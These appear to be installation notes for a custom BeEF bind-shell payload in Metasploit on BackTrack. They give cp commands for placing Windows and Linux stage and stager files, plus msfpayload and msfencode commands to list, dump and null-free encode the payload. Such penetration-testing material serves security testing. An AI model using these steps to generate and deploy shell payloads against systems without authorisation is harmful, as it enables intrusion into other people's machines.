Install into Metasploit on BackTrack: cp beef_bind-handler.rb /pentest/exploits/framework3/lib/msf/core/handler/beef_bind.rb cp beef_bind-stage-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stages/windows/beef_shell.rb cp beef_bind-stager-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/windows/beef_bind.rb cp beef_bind-stage-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x86/beef_shell.rb cp beef_bind-stager-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x86/beef_bind.rb cp beef_bind-stage-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x64/beef_shell.rb cp beef_bind-stager-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x64/beef_bind.rb Check it works: msfpayload -l | grep beef_bind Get info on the payload: msfpayload windows/beef_shell/beef_bind S Dump stager and stage in C format: msfpayload windows/beef_shell/beef_bind C Dump stager in raw format: msfpayload windows/beef_shell/beef_bind R > beef_bind-stager Encode stager to remove nulls: msfpayload windows/beef_shell/beef_bind R | msfencode -b '\x00'